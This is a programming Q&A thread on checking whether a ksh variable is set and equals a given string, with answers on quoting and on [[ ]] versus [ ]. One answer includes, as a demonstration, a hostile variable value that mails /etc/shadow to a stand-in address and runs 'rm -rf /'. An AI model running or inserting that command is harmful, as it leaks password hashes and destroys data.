# Checking a variable is set and value in ksh

Tags: shell, ksh

I have a script which takes user input, the REFRESH option is optional. I need to test to see if $REFRESH exists and is equal to the string "REFRESH", if it is then run a specific block of code.

The user would execute

```
./export_data.sh <user> <type> [REFRESH]
```

If I was doing this in PHP I would simply use the isset() function, does an equivelent exist in ksh?

I have tried the following but this fails as in the 2nd test $REFRESH is not set:

```
if [ -n $REFRESH ] && [ $REFRESH == "REFRESH" ]
then
    echo "variable is set and the expected value";
    # do stuff
fi
```

The only other way I can think to do this is a nested if but this seems messy:

```
if [ -n $REFRESH ]
then
    if [ $REFRESH == "REFRESH" ]
    then
        echo "variable is set and the expected value";
        # do stuff
fi
```

Is there a better way to do this?

Answer (score 7, accepted):

```
if [ "${REFRESH:-unset}" = "REFRESH" ]
then ...
```

This substitutes `unset` if there is no value in `$REFRESH` or if the value is the empty string.  Either way, it is not the same as "REFRESH", so it behaves as required.

When testing variables, enclose them in double quotes; it saves angst.  In fact, it would mean that you could simply write:

```
if [ "$REFRESH" = "REFRESH" ]
then ...
```

Comment: Shouldn't it be `if [ "${REFRESH:-unset}" != "unset" ]` ?

Comment: No.  From the question: _I need to test to see if $REFRESH exists and is equal to the string "REFRESH"_.

Comment: Indeed. There are really two questions, one explicit which isn't directly addressed by your reply and one implicit which is likely the real one. I answer to the other one anyway.

Comment: 've accepted Jonathan's answer as it covers both of my questions. Having gone back and looked at my script with fresh eyes I see that I have not enclosed the variable $REFRESH in quotes (now fixed). The script now work as I want. However the solution substitute a value will come in handy in the future. I don't have enough rep to vote up answers otherwise both would get +1.

Answer (score 4):

I would comment on Jonathan's reply but I'm too much of a newby around here to be trusted with such things.

Anyway, if you are trying to save yourself angst in ksh, never use the legacy Bourne shell [ ].  Instead, use [[ ]].

```
if [[ $REFRESH == REFRESH ]]; then
```

That will always evaluate the way you want it.  Even if any of the following happened just before the if statement.

```
REFRESH=''
REFRESH=' REFRESH'
REFRESH='`mailx -s "good stuff" hacker@example.com < /etc/shadow`;  sleep 5; rm -rf /`'
```

The thing to be careful of is the right hand side in the event that it is a variable or a string that could be evaluated for things other than just a simple string comparison.  Consider these:

```
$ val='@(foo|REFRESH)'
$ REFRESH=REFRESH; [[ $REFRESH == $val ]] && echo match
match
$ REFRESH=foo; [[ $REFRESH == $val ]] && echo match
match
$ REFRESH=REFRESH; [[ $REFRESH == "$val" ]] && echo match
$ REFRESH=' REFRESH'; [[ $REFRESH == REFRESH ]] && echo match
$
```

Here we see that quoting the RHS is more important than quoting the LHS when using [[ ]].  Also, this demonstrates that [[ ]] allows more powerful matches using patterns and pattern lists.

Answer (score 1):

Answering to that specific question:

***If I was doing this in PHP I would simply use the isset() function, does an equivalent exist in ksh?***

```
if [ "${REFRESH:-unset}" != unset ]
```

Answer (score 1):

By the way, in my opinion the best (because is the most simple) way to test if a variable is set or not set is:

```
if [ "$PIPPO" ] ; then  
   echo "Set"  
fi
```

OR

```
if [ ! "$PIPPO" ] ; then  
   echo "Not Set"  
fi
```